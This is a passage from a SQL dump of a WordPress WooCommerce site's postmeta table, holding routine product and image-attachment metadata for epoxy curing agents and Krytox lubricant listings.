INSERT INTO `wp_postmeta` VALUES (11940, 1031, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11941, 1031, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11942, 1031, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11943, 1031, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11944, 1031, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11945, 1031, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11946, 1031, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11947, 1031, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11948, 1031, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11949, 1031, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11950, 1031, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11951, 1031, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11952, 1031, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11953, 1031, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11954, 1031, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11955, 1031, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11956, 1031, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11957, 1031, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11958, 1031, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11959, 1031, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11960, 1031, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11961, 1031, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11962, 1031, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11963, 1031, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11964, 1031, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11965, 1031, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (11966, 1033, '_edit_lock', '1474650066:3'); 
INSERT INTO `wp_postmeta` VALUES (11967, 1033, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (11968, 1034, '_wp_attached_file', '2016/08/5003-W-55.pdf'); 
INSERT INTO `wp_postmeta` VALUES (11969, 1033, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11970, 1033, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11971, 1033, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11972, 1033, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11973, 1033, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11974, 1033, '318_custom_list_file', 'a:2:{s:32:"af03a186f76c995a40a7a35dfa1753b8";a:3:{s:4:"name";s:17:"EPI-REZ 5003-W-55";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/5003-W-55.pdf";s:4:"desc";s:21:"EPI-REZ 5003-W-55 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (11975, 1033, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (11976, 1033, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11977, 1033, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11978, 1033, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11979, 1033, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11980, 1033, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11981, 1033, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11982, 1033, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11983, 1033, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11984, 1033, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11985, 1033, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11986, 1033, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11987, 1033, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11988, 1033, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11989, 1033, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11990, 1033, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11991, 1033, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11992, 1033, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11993, 1033, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11994, 1033, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11995, 1033, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11996, 1033, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11997, 1033, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11998, 1033, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11999, 1033, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12000, 1033, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12001, 1033, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12002, 1033, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12003, 1033, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12004, 1033, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12005, 1035, '_edit_lock', '1474650166:3'); 
INSERT INTO `wp_postmeta` VALUES (12006, 1035, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12007, 1036, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-10.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12008, 1036, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:40:"2016/08/krytox-bearing-oil-grease-10.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-bearing-oil-grease-10-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-10-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12009, 1037, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-11.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12010, 1037, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5503;s:6:"height";i:3669;s:4:"file";s:40:"2016/08/krytox-bearing-oil-grease-11.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-bearing-oil-grease-11-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-11-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12011, 1038, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-12.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12012, 1038, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:40:"2016/08/krytox-bearing-oil-grease-12.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-bearing-oil-grease-12-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-12-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12013, 1001, '_thumbnail_id', '1037'); 
INSERT INTO `wp_postmeta` VALUES (12014, 1039, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-13.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12015, 1039, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5000;s:6:"height";i:5000;s:4:"file";s:40:"2016/08/krytox-bearing-oil-grease-13.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-bearing-oil-grease-13-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-13-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12016, 1040, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-14.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12017, 1040, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3237;s:6:"height";i:3183;s:4:"file";s:40:"2016/08/krytox-bearing-oil-grease-14.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-800x787.jpg";s:5:"width";i:800;s:6:"height";i:787;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-768x755.jpg";s:5:"width";i:768;s:6:"height";i:755;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"krytox-bearing-oil-grease-14-1600x1573.jpg";s:5:"width";i:1600;s:6:"height";i:1573;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-14-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12018, 1041, '_wp_attached_file', '2016/08/5522-WY-55.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12019, 998, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12020, 998, '_thumbnail_id', '1040'); 
INSERT INTO `wp_postmeta` VALUES (12021, 1035, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12022, 1035, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12023, 1035, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12024, 1035, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12025, 1035, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12026, 1035, '318_custom_list_file', 'a:2:{s:32:"ce67714a39111dfb255a6d3cd5abb376";a:3:{s:4:"name";s:18:"EPI-REZ 5522-WY-55";s:4:"file";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/5522-WY-55.pdf";s:4:"desc";s:22:"EPI-REZ 5522-WY-55 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12027, 1035, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12028, 1035, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12029, 1035, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12030, 1035, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12031, 1035, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12032, 1035, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12033, 1035, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12034, 1035, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12035, 1035, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12036, 1035, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12037, 1035, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12038, 1035, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12039, 1035, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12040, 1035, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12041, 1035, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12042, 1035, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12043, 1035, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12044, 1035, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12045, 1035, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12046, 1035, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12047, 1035, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12048, 1035, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12049, 1035, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12050, 1035, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12051, 1035, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12052, 1035, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12053, 1035, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12054, 1035, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12055, 1035, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12056, 1035, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12057, 995, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12058, 1042, '_edit_lock', '1472568315:3'); 
INSERT INTO `wp_postmeta` VALUES (12059, 1042, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12060, 1019, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12061, 1043, '_wp_attached_file', '2016/08/WD-510.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12062, 1042, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12063, 1042, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12064, 1042, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12065, 1042, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12066, 1042, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12067, 1042, '318_custom_list_file', 'a:2:{s:32:"1d507b20070e930482da9175e85d9f2b";a:3:{s:4:"name";s:14:"EPI-REZ WD 510";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/WD-510.pdf";s:4:"desc";s:18:"EPI-REZ WD 510 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12068, 1042, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12069, 1042, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12070, 1042, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12071, 1042, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12072, 1042, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12073, 1042, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12074, 1042, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12075, 1042, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12076, 1042, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12077, 1042, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12078, 1042, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12079, 1042, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12080, 1042, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12081, 1042, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12082, 1042, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12083, 1042, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12084, 1042, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12085, 1042, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12086, 1042, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12087, 1042, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12088, 1042, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12089, 1042, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12090, 1042, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12091, 1042, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12092, 1042, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12093, 1042, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12094, 1042, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12095, 1042, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12096, 1042, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12097, 1042, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12098, 1044, '_wp_attached_file', '2016/08/krytox-ts4-threaded-pipe.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12099, 1044, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5810;s:6:"height";i:3844;s:4:"file";s:36:"2016/08/krytox-ts4-threaded-pipe.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-800x529.jpg";s:5:"width";i:800;s:6:"height";i:529;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"krytox-ts4-threaded-pipe-1600x1059.jpg";s:5:"width";i:1600;s:6:"height";i:1059;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"krytox-ts4-threaded-pipe-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"or